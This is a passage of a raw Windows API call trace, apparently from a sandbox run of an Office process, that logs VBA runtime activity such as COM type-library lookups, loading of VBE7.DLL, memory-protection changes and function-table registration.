dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.563] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.563] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.563] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.563] IUnknown:Release (This=0x665ba50) returned 0xb [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.563] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.563] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.563] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.563] IUnknown:Release (This=0x665ba50) returned 0xb [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.563] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0xc10) returned 0xafba0c0 [0068.564] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.564] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.564] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.564] IUnknown:Release (This=0x665ba50) returned 0xb [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000) returned 0x0 [0068.564] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.564] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.564] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.564] IUnknown:Release (This=0x665ba50) returned 0xb [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.564] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.564] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.564] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.564] IUnknown:Release (This=0x665ba50) returned 0xb [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.564] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.564] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.565] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.565] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.565] IUnknown:Release (This=0x665ba50) returned 0xb [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.565] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.565] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.565] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.565] IUnknown:Release (This=0x665ba50) returned 0xb [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.565] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.565] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.565] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.565] IUnknown:Release (This=0x665ba50) returned 0xb [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000) returned 0x0 [0068.565] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.565] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.565] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.565] IUnknown:Release (This=0x665ba50) returned 0xb [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.565] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.566] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.566] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.566] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.566] IUnknown:Release (This=0x665ba50) returned 0xb [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.566] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.566] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.566] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.566] IUnknown:Release (This=0x665ba50) returned 0xb [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.566] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.566] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.566] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.566] IUnknown:Release (This=0x665ba50) returned 0xb [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.566] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.566] IMalloc:Realloc (This=0x7fefec05380, pv=0xafba0c0, cb=0x1010) returned 0xafba0c0 [0068.566] IMalloc:Realloc (This=0x7fefec05380, pv=0xafba0c0, cb=0xeaa) returned 0xafba0c0 [0068.566] IMalloc:Free (This=0x7fefec05380, pv=0x680a700) [0068.566] GetCurrentProcess () returned 0xffffffffffffffff [0068.566] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19208, dwSize=0x8) returned 1 [0068.566] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19148, dwSize=0x8) returned 1 [0068.567] GetCurrentProcess () returned 0xffffffffffffffff [0068.567] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19208, dwSize=0x8) returned 1 [0068.567] GetCurrentProcess () returned 0xffffffffffffffff [0068.567] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19a18, dwSize=0x8) returned 1 [0068.567] GetCurrentProcess () returned 0xffffffffffffffff [0068.567] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19ad8, dwSize=0x8) returned 1 [0068.567] GetCurrentProcess () returned 0xffffffffffffffff [0068.567] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19b98, dwSize=0x8) returned 1 [0068.567] GetCurrentProcess () returned 0xffffffffffffffff [0068.567] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5db8, dwSize=0x8) returned 1 [0068.567] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.567] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0068.567] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0068.567] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000001b4) returned 1 [0068.567] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.568] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23d) returned 0x7fee38eafec [0068.568] GetCurrentProcess () returned 0xffffffffffffffff [0068.568] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5b84, dwSize=0x43) returned 1 [0068.568] RtlLookupFunctionEntry (in: ControlPc=0xafb5b84, ImageBase=0x144f08, HistoryTable=0x144f10 | out: ImageBase=0x144f08, HistoryTable=0x144f10) returned 0x0 [0068.568] VirtualProtect (in: lpAddress=0xafb5b84, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x14500c | out: lpflOldProtect=0x14500c*=0x4) returned 1 [0068.570] RtlAddFunctionTable (FunctionTable=0xafb5bd4, EntryCount=0x1, BaseAddress=0xafb5b00, TargetGp=0x14500c) returned 1 [0068.571] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.571] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0068.571] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0068.571] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000001b5) returned 1 [0068.571] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.572] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23f) returned 0x7fee38eb100 [0068.572] GetCurrentProcess () returned 0xffffffffffffffff [0068.572] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5c4c, dwSize=0x43) returned 1 [0068.572] RtlLookupFunctionEntry (in: ControlPc=0xafb5c4c, ImageBase=0x144f08, HistoryTable=0x144f10 | out: ImageBase=0x144f08, HistoryTable=0x144f10) returned 0x0 [0068.572] VirtualProtect (in: lpAddress=0xafb5c4c, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x14500c | out: lpflOldProtect=0x14500c*=0x40) returned 1 [0068.573] RtlAddFunctionTable (FunctionTable=0xafb5c9c, EntryCount=0x1, BaseAddress=0xafb5c00, TargetGp=0x14500c) returned 1 [0068.573] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.573] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0068.573] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0068.573] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000001b6) returned 1 [0068.573] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.574] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x248) returned 0x7fee3a93440 [0068.574] GetCurrentProcess () returned 0xffffffffffffffff [0068.574] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5fc4, dwSize=0x3d) returned 1 [0068.574] RtlLookupFunctionEntry (in: ControlPc=0xafb5fc4, ImageBase=0x144f08, HistoryTable=0x144f10 | out: ImageBase=0x144f08, HistoryTable=0x144f10) returned 0x0 [0068.574] VirtualProtect (in: lpAddress=0xafb5fc4, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x14500c | out: lpflOldProtect=0x14500c*=0x40) returned 1 [0068.576] RtlAddFunctionTable (FunctionTable=0xafb6010, EntryCount=0x1, BaseAddress=0xafb5f00, TargetGp=0x14500c) returned 1 [0068.576] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.576] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0068.576] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0068.576] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000001b7) returned 1 [0068.576] SetErrorMode (uMode=0x8001) returned 0x8001 [0068.577] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x266) returned 0x7fee3a93304 [0068.577] GetCurrentProcess () returned 0xffffffffffffffff [0068.577] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6084, dwSize=0x3d) returned 1 [0068.577] RtlLookupFunctionEntry (in: ControlPc=0xafb6084, ImageBase=0x144f08, HistoryTable=0x144f10 | out: ImageBase=0x144f08, HistoryTable=0x144f10) returned 0x0 [0068.577] VirtualProtect (in: lpAddress=0xafb6084, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x14500c | out: lpflOldProtect=0x14500c*=0x40) returned 1 [0068.578] RtlAddFunctionTable (FunctionTable=0xafb60d0, EntryCount=0x1, BaseAddress=0xafb6000, TargetGp=0x14500c) returned 1 [0068.579] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.579] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146438 | out: ppvObject=0x146438*=0x0) returned 0x80004002 [0068.579] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146430 | out: ppvObject=0x146430*=0x0) returned 0x80004002 [0068.579] 